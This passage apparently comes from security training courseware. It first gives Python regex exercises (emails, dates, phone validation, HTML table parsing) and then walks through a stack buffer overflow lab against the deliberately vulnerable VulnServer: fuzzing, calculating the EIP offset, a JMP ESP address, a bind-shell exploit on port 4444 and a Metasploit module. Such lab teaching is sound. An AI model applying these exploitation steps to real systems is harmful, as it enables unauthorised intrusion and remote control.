  2947. result=re.findall(r'@\w+.\w+','abc.test@gmail.com, xyz@test.com, test.first@strategicsec.com, first.test@rest.biz')
  2948. print result
  2949.  
  2950. Output:
  2951. ['@gmail.com', '@test.com', '@strategicsec.com', '@rest.biz']
  2952.  
  2953.  
  2954.  
  2955.  
  2956.  
  2957.  
  2958. Solution – 2 Extract only domain name using "( )"
  2959. -----------------------------------------------------------------------------------------------------------------------
  2960.  
  2961.  
  2962. Code
  2963.  
  2964. result=re.findall(r'@\w+.(\w+)','abc.test@gmail.com, xyz@test.com, test.first@strategicsec.com, first.test@rest.biz')
  2965. print result
  2966.  
  2967. Output:
  2968. ['com', 'com', 'com', 'biz']
  2969.  
  2970.  
  2971.  
  2972.  
  2973.  
  2974.  
  2975. ********************************************
  2976. * Problem 4: Return date from given string *
  2977. ********************************************
  2978.  
  2979.  
  2980. Here we will use "\d" to extract digit.
  2981.  
  2982.  
  2983. Solution:
  2984. ----------------------------------------------------------------------------------------------------------------------
  2985.  
  2986. Code
  2987.  
  2988. result=re.findall(r'\d{2}-\d{2}-\d{4}','Joe 34-3456 12-05-2007, XYZ 56-4532 11-11-2016, ABC 67-8945 12-01-2009')
  2989. print result
  2990.  
  2991. Output:
  2992. ['12-05-2007', '11-11-2016', '12-01-2009']
  2993.  
  2994. If you want to extract only the year, parentheses "( )" will again help you.
  2995.  
  2996.  
  2997. Code
  2998.  
  2999.  
  3000. result=re.findall(r'\d{2}-\d{2}-(\d{4})','Joe 34-3456 12-05-2007, XYZ 56-4532 11-11-2016, ABC 67-8945 12-01-2009')
  3001. print result
  3002.  
  3003. Output:
  3004. ['2007', '2016', '2009']
  3005.  
  3006.  
  3007.  
  3008.  
  3009.  
  3010. *******************************************************************
  3011. * Problem 5: Return all words of a string that start with a vowel *
  3012. *******************************************************************
  3013.  
  3014.  
  3015.  
  3016.  
  3017. Solution-1 Return each word
  3018. -----------------------------------------------------------------------------------------------------------------
  3019.  
  3020. Code
  3021.  
  3022. result=re.findall(r'\w+','Python is the best')
  3023. print result
  3024.  
  3025. Output:
  3026. ['Python', 'is', 'the', 'best']
  3027.  
  3028.  
  3029.  
  3030.  
  3031.  
  3032. Solution-2 Return words that start with a vowel (using [])
  3033. ------------------------------------------------------------------------------------------------------------------
  3034.  
  3035. Code
  3036.  
  3037. result=re.findall(r'[aeiouAEIOU]\w+','I love Python')
  3038. print result
  3039.  
  3040. Output:
  3041. ['ove', 'on']
  3042.  
  3043. Above you can see that it has returned "ove" and "on" from the middle of words. To drop these two, we need to use "\b" for word boundary.
  3044.  
  3045.  
  3046.  
  3047.  
  3048.  
  3049. Solution- 3
  3050. ------------------------------------------------------------------------------------------------------------------
  3051.  
  3052. Code
  3053.  
  3054. result=re.findall(r'\b[aeiouAEIOU]\w+','I love Python')
  3055. print result
  3056.  
  3057. Output:
  3058. []
  3059.  
  3060.  
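  3061. The list is empty because \w+ requires at least one more word character after the vowel, so the one-letter word "I" cannot match. In a similar way, we can extract words that start with a consonant using "^" within the square brackets.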
  3062.  
  3063.  
  3064. Code
  3065.  
  3066. result=re.findall(r'\b[^aeiouAEIOU]\w+','I love Python')
  3067. print result
  3068.  
  3069. Output:
  3070. [' love', ' Python']
  3071.  
  3072. Above you can see that it has returned words starting with a space. To drop it from the output, include a space in the square brackets [].
  3073.  
  3074.  
  3075. Code
  3076.  
  3077. result=re.findall(r'\b[^aeiouAEIOU ]\w+','I love Python')
  3078. print result
  3079.  
  3080. Output:
  3081. ['love', 'Python']
  3082.  
  3083.  
  3084.  
  3085.  
  3086.  
  3087.  
  3088. *************************************************************************************************
  3089. * Problem 6: Validate a phone number (phone number must be of 10 digits and starts with 8 or 9) *
  3090. *************************************************************************************************
  3091.  
  3092.  
  3093. We have a list phone numbers in list "li" and here we will validate phone numbers using regular
  3094.  
  3095.  
  3096.  
  3097.  
  3098. Solution
  3099. -------------------------------------------------------------------------------------------------------------------------------------
  3100.  
  3101.  
  3102. Code
  3103.  
  3104. import re
  3105. li=['9999999999','999999-999','99999x9999']
  3106. for val in li:
  3107.     if re.match(r'[8-9]{1}[0-9]{9}',val) and len(val) == 10:
  3108.         print 'yes'
  3109.     else:
  3110.         print 'no'
  3111.  
  3112.  
  3113. Output:
  3114. yes
  3115. no
  3116. no
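The len(val) == 10 test in the solution above is doing real work: re.match() only anchors the start of the string. As an added example (not from the original courseware; written for Python 3, with constructed inputs and hypothetical function names), this compares five ways of writing the same check and shows which ones let malformed input through when a regex is used for input validation.

```python
import re

PHONE = r'[89][0-9]{9}'   # same rule as above: 10 digits, the first one 8 or 9


def check_prefix(val):
    """re.match() alone: anchored at the start only, trailing data is ignored."""
    return re.match(PHONE, val) is not None


def check_dollar(val):
    """Adding '$': still accepts one trailing newline, because '$' also
    matches just before a newline at the end of the string."""
    return re.match(PHONE + r'$', val) is not None


def check_page(val):
    """The approach used above: re.match() plus an explicit length test."""
    return re.match(r'[8-9]{1}[0-9]{9}', val) is not None and len(val) == 10


def check_fullmatch(val):
    """re.fullmatch(): the whole string must match, nothing before or after."""
    return re.fullmatch(PHONE, val) is not None


def check_fullmatch_d(val):
    r"""fullmatch with \d: in Python 3 str patterns \d matches any Unicode
    decimal digit, not only 0-9, unless re.ASCII is passed."""
    return re.fullmatch(r'[89]\d{9}', val) is not None


CHECKS = [check_prefix, check_dollar, check_page, check_fullmatch, check_fullmatch_d]

# Constructed inputs: the three from the list "li" above, then edge cases.
CASES = [
    '9999999999',
    '999999-999',
    '99999x9999',
    '9999999999\n',         # valid number followed by a newline
    '99999999991234',       # valid prefix followed by extra digits
    '9' + '\u0669' * 9,     # ASCII 9 followed by nine ARABIC-INDIC DIGIT NINE
]


def compare():
    """Map each input to a tuple of verdicts, in the order of CHECKS."""
    return {case: tuple(check(case) for check in CHECKS) for case in CASES}


if __name__ == "__main__":
    print("input".ljust(20), [check.__name__ for check in CHECKS])
    for case, verdicts in compare().items():
        print(repr(case).ljust(20), verdicts)
```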
  3117.  
  3118.  
  3119.  
  3120.  
  3121.  
  3122. ******************************************************
  3123. * Problem 7: Split a string with multiple delimiters *
  3124. ******************************************************
  3125.  
  3126.  
  3127.  
  3128. Solution
  3129. ---------------------------------------------------------------------------------------------------------------------------
  3130.  
  3131.  
  3132. Code
  3133.  
  3134. import re
  3135. line = 'asdf fjdk;afed,fjek,asdf,foo' # String has multiple delimiters (";",","," ").
  3136. result= re.split(r'[;,\s]', line)
  3137. print result
  3138.  
  3139. Output:
  3140. ['asdf', 'fjdk', 'afed', 'fjek', 'asdf', 'foo']
  3141.  
  3142.  
  3143.  
  3144. We can also use method re.sub() to replace these multiple delimiters with one as space " ".
  3145.  
  3146.  
  3147. Code
  3148.  
  3149. import re
  3150. line = 'asdf fjdk;afed,fjek,asdf,foo'
  3151. result= re.sub(r'[;,\s]',' ', line)
  3152. print result
  3153.  
  3154. Output:
  3155. asdf fjdk afed fjek asdf foo
  3156.  
  3157.  
  3158.  
  3159.  
  3160. **************************************************
  3161. * Problem 8: Retrieve Information from HTML file *
  3162. **************************************************
  3163.  
  3164.  
  3165.  
  3166. I want to extract information from an HTML file (see the sample data below). Here we need to extract the information available between <td> and </td>, except the first numerical index. I have assumed here that the HTML code below is stored in a string str.
  3167.  
  3168.  
  3169.  
  3170. Sample HTML file (str)
  3171.  
  3172. <tr align="center"><td>1</td> <td>Noah</td> <td>Emma</td></tr>
  3173. <tr align="center"><td>2</td> <td>Liam</td> <td>Olivia</td></tr>
  3174. <tr align="center"><td>3</td> <td>Mason</td> <td>Sophia</td></tr>
  3175. <tr align="center"><td>4</td> <td>Jacob</td> <td>Isabella</td></tr>
  3176. <tr align="center"><td>5</td> <td>William</td> <td>Ava</td></tr>
  3177. <tr align="center"><td>6</td> <td>Ethan</td> <td>Mia</td></tr>
  3178. <tr align="center"><td>7</td> <td HTML>Michael</td> <td>Emily</td></tr>
  3179. Solution:
  3180.  
  3181.  
  3182.  
  3183. Code
  3184.  
  3185. result=re.findall(r'<td>\w+</td>\s<td>(\w+)</td>\s<td>(\w+)</td>',str)
  3186. print result
  3187.  
  3188. Output:
  3189. [('Noah', 'Emma'), ('Liam', 'Olivia'), ('Mason', 'Sophia'), ('Jacob', 'Isabella'), ('William', 'Ava'), ('Ethan', 'Mia'), ('Michael', 'Emily')]
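The regex above only matches when every <td> is bare, the cells are separated by exactly one whitespace character and each name is a single word. The following added example (Python 3, not part of the original courseware) runs the same extraction with the standard library's html.parser next to the page's regex; the sample rows are constructed and the names RowCells, names_with_parser and names_with_regex are hypothetical.

```python
import re
from html.parser import HTMLParser

# Constructed sample: the page's table layout, plus an attribute on a <td>,
# a line break between cells, and a name containing a space.
SAMPLE = """<tr align="center"><td>1</td> <td>Noah</td> <td>Emma</td></tr>
<tr align="center"><td>2</td><td class="m">Liam</td>
  <td>Olivia</td></tr>
<tr align="center"><td>3</td> <td>Mary Ann</td> <td>O'Neil</td></tr>"""

PAGE_REGEX = r'<td>\w+</td>\s<td>(\w+)</td>\s<td>(\w+)</td>'  # pattern from the page


class RowCells(HTMLParser):
    """Collect the text of every <td>, grouped by its enclosing <tr>."""
    def __init__(self):
        super().__init__()
        self.rows, self._row, self._cell = [], None, None

    def handle_starttag(self, tag, attrs):
        if tag == "tr":
            self._row = []
        elif tag == "td" and self._row is not None:
            self._cell = []          # attributes on the tag are simply ignored

    def handle_data(self, data):
        if self._cell is not None:   # text outside a cell (spacing) is skipped
            self._cell.append(data)

    def handle_endtag(self, tag):
        if tag == "td" and self._cell is not None:
            self._row.append("".join(self._cell).strip())
            self._cell = None
        elif tag == "tr" and self._row is not None:
            self.rows.append(self._row)
            self._row = None


def names_with_parser(html):
    parser = RowCells()
    parser.feed(html)
    parser.close()
    # Drop the leading numeric index, as the exercise asks.
    return [tuple(row[1:]) for row in parser.rows if len(row) == 3]


def names_with_regex(html):
    return re.findall(PAGE_REGEX, html)


if __name__ == "__main__":
    print(names_with_regex(SAMPLE))   # only the first row survives
    print(names_with_parser(SAMPLE))  # all three rows
```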
  3190.  
  3191.  
  3192.  
You can read an HTML file from a URL using the urllib2 library (see the code below).


Code

import urllib2                          # Python 2 standard library
response = urllib2.urlopen('')          # put the URL of the page to fetch between the quotes
html = response.read()                  # page body as a string
  3201.  
  3202.  
  3203.  
  3204. #####################################
  3205. # Quick Stack Based Buffer Overflow #
  3206. #####################################
  3207.  
  3208. - You can download everything you need for this exercise (except netcat) from the link below
  3209. https://s3.amazonaws.com/infosecaddictsfiles/ExploitLab.zip
  3210.  
  3211. - Extract this zip file to your Desktop
  3212.  
  3213. - Go to folder C:\Users\Workshop\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe
  3214.  
  3215. - Open a new command prompt and type:
  3216. nc localhost 9999
  3217.  
  3218. - In the new command prompt window where you ran nc type:
  3219. HELP
  3220.  
  3221. - Go to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts
  3222. - Right-click on 1-simplefuzzer.py and choose the option edit with notepad++
  3223.  
  3224. - Now double-click on 1-simplefuzzer.py
  3225. - You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.
  3226.  
  3227.  
  3228. - Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.
  3229.  
  3230. - Now go to folder C:\Users\Workshop\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe
  3231.  
  3232. - Go back to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.
  3233.  
  3234. - Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).
  3235.  
  3236. - Now isolate the crash by restarting your debugger and running script 2-3000chars.py
  3237.  
  3238. - Calculate the distance to EIP by running script 3-3000chars.py
- This script sends 3000 nonrepeating chars to vulnserv.exe and populates EIP with the value: 396F4338

4-count-chars-to-EIP.py
- In the previous script we see that EIP is overwritten with 396F4338. Read in memory (little-endian) order, those bytes are 8 (38), C (43), o (6F), 9 (39)
- so we search for 8Co9 in the string of nonrepeating chars and count the distance to it
  3244.  
  3245. 5-2006char-eip-check.py
  3246. - In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242
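
The distance calculation described for 4-count-chars-to-EIP.py, worked as an added Python 3 example (not one of the lab's scripts). It assumes the 3000 nonrepeating chars follow the common Aa0Aa1Aa2... layout; cyclic_pattern and offset_from_register are hypothetical names.

```python
import string
import struct


def cyclic_pattern(length):
    """Build the non-repeating Aa0Aa1Aa2... pattern as bytes.

    Assumption: the lab's 3000-char string uses this upper/lower/digit layout.
    """
    triples = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                triples.append(upper + lower + digit)
                if len(triples) * 3 >= length:
                    return "".join(triples)[:length].encode("ascii")
    raise ValueError("pattern starts repeating after 20280 characters")


def offset_from_register(reg_value, pattern):
    """Return (offset, bytes_in_memory_order) for a 32-bit register value.

    x86 is little-endian, so 0x396F4338 sat in memory as 38 43 6F 39 ("8Co9").
    The offset is None when the register does not hold pattern bytes.
    """
    needle = struct.pack("<I", reg_value)
    first = pattern.find(needle)
    if first == -1:
        return None, needle
    if pattern.find(needle, first + 1) != -1:
        raise ValueError("sequence occurs more than once; offset is ambiguous")
    return first, needle


if __name__ == "__main__":
    pattern = cyclic_pattern(3000)
    # Value the debugger showed in EIP after the 3000-char run.
    print(offset_from_register(0x396F4338, pattern))
    # 42424242 is "BBBB", which is not part of the pattern.
    print(offset_from_register(0x42424242, pattern))
```

The offset it reports for 396F4338 is 2006, the number of filler bytes in the name of 5-2006char-eip-check.py.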
  3247.  
  3248. 6-jmp-esp.py
  3249. - In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll
  3250.  
  3251. 7-first-exploit
  3252. - In this script we actually do the stack overflow and launch a bind shell on port 4444
  3253.  
  3254. 8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.
  3255.  
  3256.  
  3257. ------------------------------
  3258.  
  3259. cd /home/strategicsec/toolz/metasploit/modules/exploits/windows/misc
  3260.  
  3261. vi vulnserv.rb (paste the code into this file)